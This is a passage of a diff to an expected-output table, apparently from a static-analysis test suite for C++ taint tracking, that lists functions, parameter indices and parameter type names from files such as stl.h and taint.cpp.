back_inserter | 0 | vector, allocator>, allocator, allocator>>> & | +| stl.h:95:44:95:44 | back_inserter | 0 | vector> & | +| stl.h:147:12:147:23 | basic_string | 0 | const allocator & | +| stl.h:148:3:148:14 | basic_string | 0 | const char * | | stl.h:148:3:148:14 | basic_string | 0 | const class:2 & | +| stl.h:148:3:148:14 | basic_string | 1 | const allocator & | | stl.h:149:33:149:44 | basic_string | 0 | const class:0 * | +| stl.h:149:33:149:44 | basic_string | 0 | func:0 | | stl.h:149:33:149:44 | basic_string | 1 | const class:2 & | +| stl.h:149:33:149:44 | basic_string | 1 | func:0 | +| stl.h:149:33:149:44 | basic_string | 2 | const allocator & | | stl.h:151:16:151:20 | c_str | 0 | func:0 | | stl.h:151:16:151:20 | c_str | 1 | func:0 | | stl.h:151:16:151:20 | c_str | 2 | const class:2 & | +| stl.h:165:8:165:16 | push_back | 0 | char | | stl.h:173:13:173:22 | operator[] | 0 | size_type | | stl.h:175:13:175:14 | at | 0 | size_type | +| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | +| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | | stl.h:176:35:176:44 | operator+= | 0 | size_type | | stl.h:176:35:176:44 | operator+= | 0 | size_type | +| stl.h:177:17:177:26 | operator+= | 0 | const char * | | stl.h:177:17:177:26 | operator+= | 0 | const func:0 & | +| stl.h:178:17:178:22 | append | 0 | const basic_string, allocator> & | | stl.h:178:17:178:22 | append | 0 | const class:0 * | | stl.h:179:17:179:22 | append | 0 | const basic_string & | +| stl.h:179:17:179:22 | append | 0 | const char * | | stl.h:180:17:180:22 | append | 0 | const class:0 * | +| stl.h:180:17:180:22 | append | 0 | size_type | +| stl.h:180:17:180:22 | append | 1 | char | +| stl.h:181:47:181:52 | append | 0 | func:0 | | stl.h:181:47:181:52 | append | 0 | size_type | | stl.h:181:47:181:52 | append | 1 | class:0 | +| stl.h:181:47:181:52 | append | 1 | func:0 | +| stl.h:182:17:182:22 | assign | 0 | const basic_string, allocator> & | | stl.h:182:17:182:22 | assign | 0 | func:0 | | stl.h:182:17:182:22 | assign | 1 | func:0 | | stl.h:183:17:183:22 | assign | 0 | const basic_string & | +| stl.h:183:17:183:22 | assign | 0 | size_type | +| stl.h:183:17:183:22 | assign | 1 | char | +| stl.h:184:47:184:52 | assign | 0 | func:0 | | stl.h:184:47:184:52 | assign | 0 | size_type | | stl.h:184:47:184:52 | assign | 1 | class:0 | +| stl.h:184:47:184:52 | assign | 1 | func:0 | | stl.h:185:17:185:22 | insert | 0 | func:0 | +| stl.h:185:17:185:22 | insert | 0 | size_type | +| stl.h:185:17:185:22 | insert | 1 | const basic_string, allocator> & | | stl.h:185:17:185:22 | insert | 1 | func:0 | | stl.h:186:17:186:22 | insert | 0 | size_type | | stl.h:186:17:186:22 | insert | 1 | const basic_string & | +| stl.h:186:17:186:22 | insert | 1 | size_type | +| stl.h:186:17:186:22 | insert | 2 | char | | stl.h:187:17:187:22 | insert | 0 | size_type | +| stl.h:187:17:187:22 | insert | 1 | const char * | | stl.h:187:17:187:22 | insert | 1 | size_type | | stl.h:187:17:187:22 | insert | 2 | class:0 | +| stl.h:188:12:188:17 | insert | 0 | const_iterator | | stl.h:188:12:188:17 | insert | 0 | size_type | | stl.h:188:12:188:17 | insert | 1 | const class:0 * | +| stl.h:188:12:188:17 | insert | 1 | size_type | +| stl.h:188:12:188:17 | insert | 2 | char | | stl.h:189:42:189:47 | insert | 0 | const_iterator | +| stl.h:189:42:189:47 | insert | 1 | func:0 | | stl.h:189:42:189:47 | insert | 1 | size_type | | stl.h:189:42:189:47 | insert | 2 | class:0 | +| stl.h:189:42:189:47 | insert | 2 | func:0 | | stl.h:190:17:190:23 | replace | 0 | const_iterator | +| stl.h:190:17:190:23 | replace | 0 | size_type | | stl.h:190:17:190:23 | replace | 1 | func:0 | +| stl.h:190:17:190:23 | replace | 1 | size_type | +| stl.h:190:17:190:23 | replace | 2 | const basic_string, allocator> & | | stl.h:190:17:190:23 | replace | 2 | func:0 | | stl.h:191:17:191:23 | replace | 0 | size_type | | stl.h:191:17:191:23 | replace | 1 | size_type | | stl.h:191:17:191:23 | replace | 2 | const basic_string & | +| stl.h:191:17:191:23 | replace | 2 | size_type | +| stl.h:191:17:191:23 | replace | 3 | char | +| stl.h:192:13:192:16 | copy | 0 | char * | | stl.h:192:13:192:16 | copy | 0 | size_type | | stl.h:192:13:192:16 | copy | 1 | size_type | | stl.h:192:13:192:16 | copy | 2 | size_type | @@ -463,11 +961,18 @@ getParameterTypeName | stl.h:193:8:193:12 | clear | 0 | class:0 * | | stl.h:193:8:193:12 | clear | 1 | size_type | | stl.h:193:8:193:12 | clear | 2 | size_type | +| stl.h:194:16:194:21 | substr | 0 | size_type | +| stl.h:194:16:194:21 | substr | 1 | size_type | +| stl.h:195:8:195:11 | swap | 0 | basic_string, allocator> & | | stl.h:195:8:195:11 | swap | 0 | size_type | | stl.h:195:8:195:11 | swap | 1 | size_type | | stl.h:198:94:198:102 | operator+ | 0 | const basic_string & | +| stl.h:198:94:198:102 | operator+ | 0 | const basic_string, allocator> & | | stl.h:198:94:198:102 | operator+ | 1 | const basic_string & | +| stl.h:198:94:198:102 | operator+ | 1 | const basic_string, allocator> & | | stl.h:199:94:199:102 | operator+ | 0 | const basic_string & | +| stl.h:199:94:199:102 | operator+ | 0 | const basic_string, allocator> & | +| stl.h:199:94:199:102 | operator+ | 1 | const char * | | stl.h:199:94:199:102 | operator+ | 1 | const func:0 * | | stl.h:214:33:214:42 | operator>> | 0 | int & | | stl.h:217:33:217:35 | get | 0 | char_type & | @@ -484,26 +989,49 @@ getParameterTypeName | stl.h:226:32:226:38 | getline | 1 | streamsize | | stl.h:226:32:226:38 | getline | 2 | char_type | | stl.h:229:68:229:77 | operator>> | 0 | basic_istream & | +| stl.h:229:68:229:77 | operator>> | 0 | basic_istream> & | +| stl.h:229:68:229:77 | operator>> | 1 | char * | | stl.h:229:68:229:77 | operator>> | 1 | func:0 * | | stl.h:230:85:230:94 | operator>> | 0 | basic_istream & | +| stl.h:230:85:230:94 | operator>> | 0 | basic_istream> & | | stl.h:230:85:230:94 | operator>> | 1 | basic_string & | +| stl.h:230:85:230:94 | operator>> | 1 | basic_string, allocator> & | | stl.h:232:84:232:90 | getline | 0 | basic_istream & | +| stl.h:232:84:232:90 | getline | 0 | basic_istream> & | | stl.h:232:84:232:90 | getline | 1 | basic_string & | +| stl.h:232:84:232:90 | getline | 1 | basic_string, allocator> & | +| stl.h:232:84:232:90 | getline | 2 | char | | stl.h:232:84:232:90 | getline | 2 | func:0 | | stl.h:233:84:233:90 | getline | 0 | basic_istream & | +| stl.h:233:84:233:90 | getline | 0 | basic_istream> & | | stl.h:233:84:233:90 | getline | 1 | basic_string & | +| stl.h:233:84:233:90 | getline | 1 | basic_string, allocator> & | | stl.h:240:33:240:42 | operator<< | 0 | int | | stl.h:242:33:242:35 | put | 0 | char_type | | stl.h:243:33:243:37 | write | 0 | const char_type * | | stl.h:243:33:243:37 | write | 1 | streamsize | | stl.h:247:67:247:76 | operator<< | 0 | basic_ostream & | +| stl.h:247:67:247:76 | operator<< | 0 | basic_ostream> & | +| stl.h:247:67:247:76 | operator<< | 1 | const char * | | stl.h:247:67:247:76 | operator<< | 1 | const func:0 * | | stl.h:248:85:248:94 | operator<< | 0 | basic_ostream & | +| stl.h:248:85:248:94 | operator<< | 0 | basic_ostream> & | | stl.h:248:85:248:94 | operator<< | 1 | const basic_string & | +| stl.h:248:85:248:94 | operator<< | 1 | const basic_string, allocator> & | | stl.h:259:12:259:29 | basic_stringstream | 0 | const basic_string & | +| stl.h:259:12:259:29 | basic_stringstream | 0 | const basic_string, allocator> & | | stl.h:263:23:263:31 | operator= | 0 | basic_stringstream && | +| stl.h:263:23:263:31 | operator= | 0 | basic_stringstream, allocator> && | | stl.h:265:8:265:11 | swap | 0 | basic_stringstream & | +| stl.h:265:8:265:11 | swap | 0 | basic_stringstream, allocator> & | | stl.h:268:8:268:10 | str | 0 | const basic_string & | +| stl.h:268:8:268:10 | str | 0 | const basic_string, allocator> & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator & | +| stl.h:293:12:293:17 | vector | 0 | const allocator, allocator>> & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | @@ -513,6 +1041,9 @@ getParameterTypeName | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | +| stl.h:294:12:294:17 | vector | 1 | const allocator & | +| stl.h:294:12:294:17 | vector | 1 | const allocator & | +| stl.h:294:12:294:17 | vector | 1 | const allocator>> & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | @@ -520,13 +1051,20 @@ getParameterTypeName | stl.h:295:3:295:8 | vector | 0 | size_type | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | +| stl.h:295:3:295:8 | vector | 1 | const int & | +| stl.h:295:3:295:8 | vector | 1 | const short & | +| stl.h:295:3:295:8 | vector | 2 | const allocator & | +| stl.h:295:3:295:8 | vector | 2 | const allocator & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:296:101:296:106 | vector | 0 | func:0 | | stl.h:296:101:296:106 | vector | 1 | func:0 | +| stl.h:296:101:296:106 | vector | 2 | const allocator & | | stl.h:296:101:296:106 | vector | 2 | const class:1 & | | stl.h:301:11:301:19 | operator= | 0 | const vector & | +| stl.h:301:11:301:19 | operator= | 0 | const vector> & | | stl.h:302:11:302:19 | operator= | 0 | vector && | +| stl.h:302:11:302:19 | operator= | 0 | vector> && | | stl.h:303:106:303:111 | assign | 0 | func:0 | | stl.h:303:106:303:111 | assign | 1 | func:0 | | stl.h:306:8:306:13 | assign | 0 | size_type | @@ -535,6 +1073,9 @@ getParameterTypeName | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | +| stl.h:306:8:306:13 | assign | 1 | const float & | +| stl.h:306:8:306:13 | assign | 1 | const int & | +| stl.h:306:8:306:13 | assign | 1 | const int *const & | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | @@ -542,11 +1083,15 @@ getParameterTypeName | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:318:13:318:14 | at | 0 | size_type | +| stl.h:327:8:327:16 | push_back | 0 | const MyPair & | +| stl.h:327:8:327:16 | push_back | 0 | const MyVectorContainer & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:328:8:328:16 | push_back | 0 | class:0 && | +| stl.h:328:8:328:16 | push_back | 0 | int && | | stl.h:331:12:331:17 | insert | 0 | const_iterator | | stl.h:331:12:331:17 | insert | 1 | class:0 && | +| stl.h:331:12:331:17 | insert | 1 | int && | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 1 | func:0 | @@ -557,21 +1102,38 @@ getParameterTypeName | stl.h:335:37:335:43 | emplace | 1 | func:0 && | | stl.h:336:33:336:44 | emplace_back | 0 | func:0 && | | stl.h:338:8:338:11 | swap | 0 | vector & | +| stl.h:338:8:338:11 | swap | 0 | vector> & | | stl.h:351:12:351:21 | shared_ptr | 0 | class:0 * | +| stl.h:351:12:351:21 | shared_ptr | 0 | int * | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | +| stl.h:369:12:369:21 | unique_ptr | 0 | A * | | stl.h:369:12:369:21 | unique_ptr | 0 | class:0 * | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | +| stl.h:380:52:380:62 | make_unique | 0 | int && | +| stl.h:380:52:380:62 | make_unique | 0 | int && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | +| stl.h:382:52:382:62 | make_shared | 0 | int && | +| stl.h:382:52:382:62 | make_shared | 0 | int && | +| stl.h:396:3:396:3 | pair | 0 | char *const & | +| stl.h:396:3:396:3 | pair | 0 | char *const & | +| stl.h:396:3:396:3 | pair | 0 | const char *const & | +| stl.h:396:3:396:3 | pair | 0 | const char *const & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | +| stl.h:396:3:396:3 | pair | 0 | const pair & | +| stl.h:396:3:396:3 | pair | 1 | char *const & | +| stl.h:396:3:396:3 | pair | 1 | char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | +| stl.h:396:3:396:3 | pair | 1 | const char *const & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | @@ -590,12 +1152,24 @@ getParameterTypeName | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:399:8:399:11 | swap | 0 | pair & | +| stl.h:402:72:402:72 | make_pair | 0 | char *&& | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | +| stl.h:402:72:402:72 | make_pair | 0 | pair && | +| stl.h:402:72:402:72 | make_pair | 1 | char *&& | +| stl.h:402:72:402:72 | make_pair | 1 | char *&& | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[2] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | +| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | @@ -603,7 +1177,9 @@ getParameterTypeName | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:422:3:422:5 | map | 0 | const map & | +| stl.h:422:3:422:5 | map | 0 | const map, allocator>> & | | stl.h:426:8:426:16 | operator= | 0 | const map & | +| stl.h:426:8:426:16 | operator= | 0 | const map, allocator>> & | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:436:6:436:7 | at | 0 | const key_type & | @@ -633,14 +1209,19 @@ getParameterTypeName | stl.h:454:30:454:45 | insert_or_assign | 2 | func:0 && | | stl.h:456:12:456:16 | erase | 0 | iterator | | stl.h:459:8:459:11 | swap | 0 | map & | +| stl.h:459:8:459:11 | swap | 0 | map, allocator>> & | | stl.h:462:27:462:31 | merge | 0 | map & | +| stl.h:462:27:462:31 | merge | 0 | map>> & | | stl.h:465:12:465:15 | find | 0 | const key_type & | | stl.h:468:12:468:22 | lower_bound | 0 | const key_type & | | stl.h:470:12:470:22 | upper_bound | 0 | const key_type & | | stl.h:473:28:473:38 | equal_range | 0 | const key_type & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | +| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, equal_to, allocator>> & | +| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, hash, equal_to, allocator>>> & | | stl.h:494:18:494:26 | operator= | 0 | const unordered_map & | +| stl.h:494:18:494:26 | operator= | 0 | const unordered_map, equal_to, allocator>> & | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:504:16:504:17 | at | 0 | const key_type & | @@ -679,13 +1260,17 @@ getParameterTypeName | stl.h:522:30:522:45 | insert_or_assign | 2 | func:0 && | | stl.h:524:12:524:16 | erase | 0 | iterator | | stl.h:527:8:527:11 | swap | 0 | unordered_map & | +| stl.h:527:8:527:11 | swap | 0 | unordered_map, equal_to, allocator>> & | | stl.h:530:37:530:41 | merge | 0 | unordered_map & | +| stl.h:530:37:530:41 | merge | 0 | unordered_map>> & | | stl.h:533:12:533:15 | find | 0 | const key_type & | | stl.h:536:28:536:38 | equal_range | 0 | const key_type & | | stl.h:555:3:555:5 | set | 0 | const set & | +| stl.h:555:3:555:5 | set | 0 | const set, allocator> & | | stl.h:557:33:557:35 | set | 0 | func:0 | | stl.h:557:33:557:35 | set | 1 | func:0 | | stl.h:560:8:560:16 | operator= | 0 | const set & | +| stl.h:560:8:560:16 | operator= | 0 | const set, allocator> & | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:569:36:569:47 | emplace_hint | 0 | const_iterator | @@ -699,16 +1284,20 @@ getParameterTypeName | stl.h:574:38:574:43 | insert | 1 | func:0 | | stl.h:576:12:576:16 | erase | 0 | iterator | | stl.h:579:8:579:11 | swap | 0 | set & | +| stl.h:579:8:579:11 | swap | 0 | set, allocator> & | | stl.h:582:27:582:31 | merge | 0 | set & | +| stl.h:582:27:582:31 | merge | 0 | set> & | | stl.h:585:12:585:15 | find | 0 | const key_type & | | stl.h:588:12:588:22 | lower_bound | 0 | const key_type & | | stl.h:590:12:590:22 | upper_bound | 0 | const key_type & | | stl.h:592:28:592:38 | equal_range | 0 | const key_type & | | stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set & | +| stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set, equal_to, allocator> & | | stl.h:611:33:611:45 | unordered_set | 0 | func:0 | | stl.h:611:33:611:45 | unordered_set | 1 | func:0 | | stl.h:611:33:611:45 | unordered_set | 2 | size_type | | stl.h:614:18:614:26 | operator= | 0 | const unordered_set & | +| stl.h:614:18:614:26 | operator= | 0 | const unordered_set, equal_to, allocator> & | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:623:36:623:47 | emplace_hint | 0 | const_iterator | @@ -722,23 +1311,282 @@ getParameterTypeName | stl.h:628:38:628:43 | insert | 1 | func:0 | | stl.h:630:12:630:16 | erase | 0 | iterator | | stl.h:633:8:633:11 | swap | 0 | unordered_set & | +| stl.h:633:8:633:11 | swap | 0 | unordered_set, equal_to, allocator> & | | stl.h:636:37:636:41 | merge | 0 | unordered_set & | +| stl.h:636:37:636:41 | merge | 0 | unordered_set> & | | stl.h:639:12:639:15 | find | 0 | const key_type & | | stl.h:641:28:641:38 | equal_range | 0 | const key_type & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:678:33:678:38 | format | 0 | format_string | | stl.h:678:33:678:38 | format | 0 | format_string | +| stl.h:678:33:678:38 | format | 1 | char *&& | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 0 | format_string | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | func:0 && | +| stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | int & | +| string.cpp:17:6:17:9 | sink | 0 | const char * | +| string.cpp:18:6:18:9 | sink | 0 | const string & | +| string.cpp:19:6:19:9 | sink | 0 | const char * | +| string.cpp:19:6:19:9 | sink | 1 | const char * | +| string.cpp:20:6:20:9 | sink | 0 | char | +| string.cpp:21:6:21:9 | sink | 0 | iterator | +| stringstream.cpp:13:6:13:9 | sink | 0 | int | +| stringstream.cpp:15:6:15:9 | sink | 0 | const string & | | stringstream.cpp:18:6:18:9 | sink | 0 | const basic_ostream> & | | stringstream.cpp:21:6:21:9 | sink | 0 | const basic_istream> & | | stringstream.cpp:24:6:24:9 | sink | 0 | const basic_iostream> & | +| stringstream.cpp:26:6:26:29 | test_stringstream_string | 0 | int | +| stringstream.cpp:70:6:70:26 | test_stringstream_int | 0 | int | +| structlikeclass.cpp:5:7:5:7 | StructLikeClass | 0 | StructLikeClass && | +| structlikeclass.cpp:5:7:5:7 | StructLikeClass | 0 | const StructLikeClass & | +| structlikeclass.cpp:5:7:5:7 | operator= | 0 | StructLikeClass && | +| structlikeclass.cpp:5:7:5:7 | operator= | 0 | const StructLikeClass & | +| structlikeclass.cpp:8:2:8:16 | StructLikeClass | 0 | int | +| swap1.cpp:14:9:14:9 | move | 0 | Class & | | swap1.cpp:14:9:14:9 | move | 0 | func:0 & | +| swap1.cpp:24:9:24:13 | Class | 0 | Class && | +| swap1.cpp:25:9:25:13 | Class | 0 | const Class & | +| swap1.cpp:27:16:27:24 | operator= | 0 | const Class & | +| swap1.cpp:34:16:34:24 | operator= | 0 | Class && | +| swap1.cpp:40:16:40:26 | copy_assign | 0 | const Class & | +| swap1.cpp:47:16:47:26 | move_assign | 0 | Class && | +| swap1.cpp:53:14:53:17 | swap | 0 | Class & | +| swap1.cpp:61:10:61:13 | swap | 0 | Class & | +| swap1.cpp:61:10:61:13 | swap | 1 | Class & | +| swap2.cpp:14:9:14:9 | move | 0 | Class & | | swap2.cpp:14:9:14:9 | move | 0 | func:0 & | +| swap2.cpp:24:9:24:13 | Class | 0 | Class && | +| swap2.cpp:25:9:25:13 | Class | 0 | const Class & | +| swap2.cpp:27:16:27:24 | operator= | 0 | const Class & | +| swap2.cpp:34:16:34:24 | operator= | 0 | Class && | +| swap2.cpp:40:16:40:26 | copy_assign | 0 | const Class & | +| swap2.cpp:47:16:47:26 | move_assign | 0 | Class && | +| swap2.cpp:53:14:53:17 | swap | 0 | Class & | +| swap2.cpp:61:10:61:13 | swap | 0 | Class & | +| swap2.cpp:61:10:61:13 | swap | 1 | Class & | | swap.h:4:20:4:23 | swap | 0 | func:0 & | +| swap.h:4:20:4:23 | swap | 0 | int & | | swap.h:4:20:4:23 | swap | 1 | func:0 & | +| swap.h:4:20:4:23 | swap | 1 | int & | +| taint.cpp:4:6:4:21 | arithAssignments | 0 | int | +| taint.cpp:4:6:4:21 | arithAssignments | 1 | int | +| taint.cpp:22:5:22:13 | increment | 0 | int | +| taint.cpp:23:5:23:8 | zero | 0 | int | +| taint.cpp:69:7:69:7 | MyClass | 0 | MyClass && | +| taint.cpp:69:7:69:7 | MyClass | 0 | const MyClass & | +| taint.cpp:69:7:69:7 | operator= | 0 | MyClass && | +| taint.cpp:69:7:69:7 | operator= | 0 | const MyClass & | +| taint.cpp:100:6:100:15 | array_test | 0 | int | +| taint.cpp:142:5:142:10 | select | 0 | int | +| taint.cpp:142:5:142:10 | select | 1 | int | +| taint.cpp:142:5:142:10 | select | 2 | int | +| taint.cpp:150:6:150:12 | fn_test | 0 | int | +| taint.cpp:156:7:156:12 | strcpy | 0 | char * | +| taint.cpp:156:7:156:12 | strcpy | 1 | const char * | +| taint.cpp:157:7:157:12 | strcat | 0 | char * | +| taint.cpp:157:7:157:12 | strcat | 1 | const char * | +| taint.cpp:180:7:180:12 | callee | 0 | int * | +| taint.cpp:190:7:190:12 | memcpy | 0 | void * | +| taint.cpp:190:7:190:12 | memcpy | 1 | void * | +| taint.cpp:190:7:190:12 | memcpy | 2 | int | +| taint.cpp:192:6:192:16 | test_memcpy | 0 | int * | +| taint.cpp:228:11:228:11 | (unnamed constructor) | 0 | const lambda [] type at line 233, col. 11 & | +| taint.cpp:228:11:228:11 | (unnamed constructor) | 0 | lambda [] type at line 233, col. 11 && | +| taint.cpp:228:11:228:11 | operator= | 0 | const lambda [] type at line 233, col. 11 & | +| taint.cpp:235:11:235:11 | (unnamed constructor) | 0 | const lambda [] type at line 240, col. 11 & | +| taint.cpp:235:11:235:11 | (unnamed constructor) | 0 | lambda [] type at line 240, col. 11 && | +| taint.cpp:235:11:235:11 | operator= | 0 | const lambda [] type at line 240, col. 11 & | +| taint.cpp:243:11:243:11 | (unnamed constructor) | 0 | const lambda [] type at line 248, col. 11 & | +| taint.cpp:243:11:243:11 | (unnamed constructor) | 0 | lambda [] type at line 248, col. 11 && | +| taint.cpp:243:11:243:11 | operator= | 0 | const lambda [] type at line 248, col. 11 & | +| taint.cpp:249:11:249:11 | (unnamed constructor) | 0 | const lambda [] type at line 254, col. 11 & | +| taint.cpp:249:11:249:11 | (unnamed constructor) | 0 | lambda [] type at line 254, col. 11 && | +| taint.cpp:249:11:249:11 | operator= | 0 | const lambda [] type at line 254, col. 11 & | +| taint.cpp:249:13:249:13 | _FUN | 0 | int | +| taint.cpp:249:13:249:13 | _FUN | 1 | int | +| taint.cpp:249:13:249:13 | operator() | 0 | int | +| taint.cpp:249:13:249:13 | operator() | 1 | int | +| taint.cpp:255:11:255:11 | (unnamed constructor) | 0 | const lambda [] type at line 260, col. 11 & | +| taint.cpp:255:11:255:11 | (unnamed constructor) | 0 | lambda [] type at line 260, col. 11 && | +| taint.cpp:255:11:255:11 | operator= | 0 | const lambda [] type at line 260, col. 11 & | +| taint.cpp:255:13:255:13 | _FUN | 0 | int & | +| taint.cpp:255:13:255:13 | _FUN | 1 | int & | +| taint.cpp:255:13:255:13 | _FUN | 2 | int & | +| taint.cpp:255:13:255:13 | operator() | 0 | int & | +| taint.cpp:255:13:255:13 | operator() | 1 | int & | +| taint.cpp:255:13:255:13 | operator() | 2 | int & | +| taint.cpp:266:5:266:6 | id | 0 | int | +| taint.cpp:297:6:297:14 | myAssign1 | 0 | int & | +| taint.cpp:297:6:297:14 | myAssign1 | 1 | int & | +| taint.cpp:302:6:302:14 | myAssign2 | 0 | int & | +| taint.cpp:302:6:302:14 | myAssign2 | 1 | int | +| taint.cpp:307:6:307:14 | myAssign3 | 0 | int * | +| taint.cpp:307:6:307:14 | myAssign3 | 1 | int | +| taint.cpp:312:6:312:14 | myAssign4 | 0 | int * | +| taint.cpp:312:6:312:14 | myAssign4 | 1 | int | +| taint.cpp:320:6:320:16 | myNotAssign | 0 | int & | +| taint.cpp:320:6:320:16 | myNotAssign | 1 | int & | +| taint.cpp:361:7:361:12 | strdup | 0 | const char * | +| taint.cpp:362:7:362:13 | strndup | 0 | const char * | +| taint.cpp:362:7:362:13 | strndup | 1 | size_t | +| taint.cpp:363:10:363:15 | wcsdup | 0 | const wchar_t * | +| taint.cpp:364:7:364:13 | strdupa | 0 | const char * | +| taint.cpp:365:7:365:14 | strndupa | 0 | const char * | +| taint.cpp:365:7:365:14 | strndupa | 1 | size_t | +| taint.cpp:367:6:367:16 | test_strdup | 0 | char * | +| taint.cpp:379:6:379:17 | test_strndup | 0 | int | +| taint.cpp:387:6:387:16 | test_wcsdup | 0 | wchar_t * | +| taint.cpp:397:6:397:17 | test_strdupa | 0 | char * | +| taint.cpp:409:6:409:18 | test_strndupa | 0 | int | +| taint.cpp:419:7:419:7 | MyClass2 | 0 | MyClass2 && | +| taint.cpp:419:7:419:7 | MyClass2 | 0 | const MyClass2 & | +| taint.cpp:419:7:419:7 | operator= | 0 | MyClass2 && | +| taint.cpp:419:7:419:7 | operator= | 0 | const MyClass2 & | +| taint.cpp:421:2:421:9 | MyClass2 | 0 | int | +| taint.cpp:422:7:422:15 | setMember | 0 | int | +| taint.cpp:428:7:428:7 | MyClass3 | 0 | MyClass3 && | +| taint.cpp:428:7:428:7 | MyClass3 | 0 | const MyClass3 & | +| taint.cpp:428:7:428:7 | operator= | 0 | MyClass3 && | +| taint.cpp:428:7:428:7 | operator= | 0 | const MyClass3 & | +| taint.cpp:430:2:430:9 | MyClass3 | 0 | const char * | +| taint.cpp:431:7:431:15 | setString | 0 | const char * | +| taint.cpp:474:6:474:9 | swop | 0 | int & | +| taint.cpp:474:6:474:9 | swop | 1 | int & | +| taint.cpp:500:5:500:12 | getdelim | 0 | char ** | +| taint.cpp:500:5:500:12 | getdelim | 1 | size_t * | +| taint.cpp:500:5:500:12 | getdelim | 2 | int | +| taint.cpp:500:5:500:12 | getdelim | 3 | FILE * | +| taint.cpp:502:6:502:18 | test_getdelim | 0 | FILE * | +| taint.cpp:512:7:512:12 | strtok | 0 | char * | +| taint.cpp:512:7:512:12 | strtok | 1 | const char * | +| 